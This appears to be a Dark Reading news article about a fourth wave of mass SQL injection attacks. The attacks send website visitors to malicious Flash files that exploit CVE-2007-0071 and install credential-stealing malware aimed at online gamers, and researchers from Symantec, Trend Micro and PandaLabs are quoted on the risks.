Mass SQL injection attack, take four: Yet another wave of SQL injection attacks is exploiting an Adobe Flash vulnerability that appears to be coming from the same series of attacks originating from China. (See Silent But Deadly Web Defacement, Third Wave of Web Attacks Not the Last, and Bots Use SQL Injection Tool in New Web Attack.)
The intent, as in previous attacks, has been to steal online gamers password credentials. But given the persistence and scope of the attacks over the past few months, researchers worry that World of Warcraft players and other gaming jocks arent the only users at risk in these stubborn Website attacks.
Even if a user isnt online-gaming, he or she could become a victim of the attack, says Ben Greenbaum, senior research manager at Symantec Security Response. The hostile portion of this content lives on attacker-controlled servers... and they could change their payload at any time, injecting keyloggers or other more malicious programs to steal personal information, for instance.
Ivan Macalintal, senior research engineer for Trend Micro, agrees. The payload... could be dynamically changed at any time [by] the remote attacker. If they want to change it to other password stealers, it would be potentially damaging to other users besides online gamers.
The latest attack works like this: A vulnerable Website is first compromised with a SQL injection attack, and the malicious script thats injected points a visitors browser to a malicious URL that carries ShockWave (SWF) files that exploit the Adobe Flash bug (aka CVE-2007-0071), according to Trend Micro. Then unbeknownst to the user, his or her vulnerable machine downloads the malicious file, which researchers say is either spyware to steal credentials, or some type of Trojan dropper to download other malicious files.
Symantec originally reported that the attack was using a zero-day Adobe Flash exploit, but later found that it was the existing and recently patched buffer-overflow bug in the Flash Player, which hits when Flash Player processes a malicious SWF file. Still, some of the latest versions of the Adobe Flash Player appear to be susceptible to the attack even with the patch, notes Symantecs Greenbaum, including the newest version of the Linux stand-alone player and the Debugger version of the player. (See The Zero Day That Isn't.)
The attack appears to be using and reusing the same domains as in previous waves of SQL injection attacks. And the same exploit code in the threat chain, Trends Macalintal says. They are using the same or similar types of data from a family of online [credential]-stealing Trojans.
ShadowServer, meanwhile, has posted a list of some of the Websites that are exploiting the Adobe Flash Player flaw.
One feature of the attack is that the infected Website appears to check the victims browser type as well as his or her Flash Player version in order to drop the appropriate exploit.
What do the nefarious SWF files look like? Panda Labs researchers say that in some cases, theyre in the form of animation a user has to run, or an image on the Web page. The maliciously-crafted Flash file could come in the form of a novelty animation which users have to run or it could be an image which is loaded directly on opening the Web page. This way, users would not suspect the infection, as the Web page could appear to be completely legitimate, says Luis Corrons, technical director of PandaLabs in a written assessment of the threat. The fact that the vulnerability can be exploited regardless of the browser used, allows cyber-crooks to infect a greater number of users.
And look for more versions of this monster SQL injection attack, which takes advantage of the prolific flaw in many Websites. Theyre not going to stop at stealing passwords and selling them to the cyber underground for gamers, Trends Macalintal says.
Have a comment on this story? Please click "Discuss" below. If you'd like to contact Dark Reading's editors directly, send us a message.